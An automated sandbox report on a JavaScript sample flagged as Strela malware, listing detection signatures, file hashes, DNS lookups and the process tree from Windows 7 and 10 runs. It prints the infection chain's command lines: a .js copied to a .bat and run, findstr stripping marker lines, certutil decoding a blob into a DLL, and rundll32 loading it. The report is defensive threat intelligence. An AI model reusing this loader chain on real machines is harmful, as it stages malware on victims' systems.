Analysis Overview
SHA256
d910b9c7e64514dbbceb22bae74790984731877c5e45f06d9e716ae48e1b986a
Threat Level: Known bad
The file 9573_21597333807.js was found to be: Known bad.
Malicious Activity Summary
Strela
Loads dropped DLL
Checks computer location settings
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-02-16 12:22
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-02-16 12:22
Reported
2024-02-16 12:24
Platform
win7-20240215-en
Max time kernel
117s
Max time network
119s
Command Line
Signatures
Strela
Loads dropped DLL
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\9573_21597333807.js
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\9573_21597333807.js" "C:\Users\Admin\\calculatingmomentous.bat" && "C:\Users\Admin\\calculatingmomentous.bat"
C:\Windows\system32\fc.exe
fC …
C:\Windows\system32\findstr.exe
findstr /V airpuny ""C:\Users\Admin\\calculatingmomentous.bat""
C:\Windows\system32\certutil.exe
certutil -f -decode condemnedtoothsome crosssugar.dll
C:\Windows\system32\rundll32.exe
rundll32 crosssugar.dll,main
Network
Files
C:\Users\Admin\calculatingmomentous.bat
| MD5 | 8b5f798bc01985c75d37510670f046b8 |
| SHA1 | dc65db3178e9089186160059399ee85cb61e487e |
| SHA256 | d910b9c7e64514dbbceb22bae74790984731877c5e45f06d9e716ae48e1b986a |
| SHA512 | 5bd7e9da95587597e1f78cc8e4ac2fcd4fbca281116097b20ac4a5bc579d2ddfc6cb6c678f12f27c621616bc9819be8ae9dd91169a483c7ffa5ce6c8e3dc5312 |
C:\Users\Admin\condemnedtoothsome
| MD5 | a0fefffb0db449a46b243012f1beb383 |
| SHA1 | d6fff628baafed3dff7d2e19c78036b7cd0ea41d |
| SHA256 | faf1adbc627a95eb5879f5ecc6768db7892e11f466304420db9200bf32032e05 |
| SHA512 | b6d29a56b19e20868ea56b381c53f49e8111d190edaa17ad8c91e4d4eeeb9ab74e1f92df886ea4e3078f014509c08d1301f3a3f590a2af53beab573a117604be |
C:\Users\Admin\crosssugar.dll
| MD5 | 1d9e331af631be2b1d5f6e5816afddd0 |
| SHA1 | b8d9864f1c15f4692cde377f4f63804a68f3b7d1 |
| SHA256 | 34eec1db863d20eeba7568a74b64ddc2c6510762c6ff59a4a00e3d5a70d68fa7 |
| SHA512 | 771ab41d4d361a000d0a76077098a7d8e63d6375d1dfdedf9e916508a8a5455260e839439babbf6e2500581c0e65b21eb22649e1b8c8db467603229c3c001ab0 |
memory/1660-1830-0x000007FEF6330000-0x000007FEF6492000-memory.dmp
memory/1660-1831-0x00000000004A0000-0x00000000004C3000-memory.dmp
memory/1660-1832-0x00000000004A0000-0x00000000004C3000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-02-16 12:22
Reported
2024-02-16 12:24
Platform
win10v2004-20231222-en
Max time kernel
144s
Max time network
146s
Command Line
Signatures
Strela
Checks computer location settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\svchost.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 1460 wrote to memory of 3916 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\cmd.exe |
| PID 1460 wrote to memory of 3916 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\cmd.exe |
| PID 3916 wrote to memory of 540 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\fc.exe |
| PID 3916 wrote to memory of 540 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\fc.exe |
| PID 3916 wrote to memory of 2832 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\findstr.exe |
| PID 3916 wrote to memory of 2832 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\findstr.exe |
| PID 3916 wrote to memory of 3764 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\certutil.exe |
| PID 3916 wrote to memory of 3764 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\certutil.exe |
| PID 3916 wrote to memory of 4584 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 3916 wrote to memory of 4584 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\rundll32.exe |
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\9573_21597333807.js
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\9573_21597333807.js" "C:\Users\Admin\\calculatingmomentous.bat" && "C:\Users\Admin\\calculatingmomentous.bat"
C:\Windows\system32\fc.exe
fC …
C:\Windows\system32\findstr.exe
findstr /V airpuny ""C:\Users\Admin\\calculatingmomentous.bat""
C:\Windows\system32\certutil.exe
certutil -f -decode condemnedtoothsome crosssugar.dll
C:\Windows\system32\rundll32.exe
rundll32 crosssugar.dll,main
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.110.54.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\calculatingmomentous.bat
| MD5 | 8b5f798bc01985c75d37510670f046b8 |
| SHA1 | dc65db3178e9089186160059399ee85cb61e487e |
| SHA256 | d910b9c7e64514dbbceb22bae74790984731877c5e45f06d9e716ae48e1b986a |
| SHA512 | 5bd7e9da95587597e1f78cc8e4ac2fcd4fbca281116097b20ac4a5bc579d2ddfc6cb6c678f12f27c621616bc9819be8ae9dd91169a483c7ffa5ce6c8e3dc5312 |
C:\Users\Admin\condemnedtoothsome
| MD5 | a0fefffb0db449a46b243012f1beb383 |
| SHA1 | d6fff628baafed3dff7d2e19c78036b7cd0ea41d |
| SHA256 | faf1adbc627a95eb5879f5ecc6768db7892e11f466304420db9200bf32032e05 |
| SHA512 | b6d29a56b19e20868ea56b381c53f49e8111d190edaa17ad8c91e4d4eeeb9ab74e1f92df886ea4e3078f014509c08d1301f3a3f590a2af53beab573a117604be |
C:\Users\Admin\crosssugar.dll
| MD5 | 1d9e331af631be2b1d5f6e5816afddd0 |
| SHA1 | b8d9864f1c15f4692cde377f4f63804a68f3b7d1 |
| SHA256 | 34eec1db863d20eeba7568a74b64ddc2c6510762c6ff59a4a00e3d5a70d68fa7 |
| SHA512 | 771ab41d4d361a000d0a76077098a7d8e63d6375d1dfdedf9e916508a8a5455260e839439babbf6e2500581c0e65b21eb22649e1b8c8db467603229c3c001ab0 |
memory/4584-1827-0x00007FFE7B800000-0x00007FFE7B962000-memory.dmp
memory/4584-1828-0x000002575DD30000-0x000002575DD53000-memory.dmp
memory/2472-1829-0x000001DECB4A0000-0x000001DECB4B0000-memory.dmp
memory/2472-1845-0x000001DECB5A0000-0x000001DECB5B0000-memory.dmp
memory/2472-1861-0x000001DED3910000-0x000001DED3911000-memory.dmp
memory/2472-1863-0x000001DED3940000-0x000001DED3941000-memory.dmp
memory/2472-1864-0x000001DED3940000-0x000001DED3941000-memory.dmp
memory/2472-1865-0x000001DED3A50000-0x000001DED3A51000-memory.dmp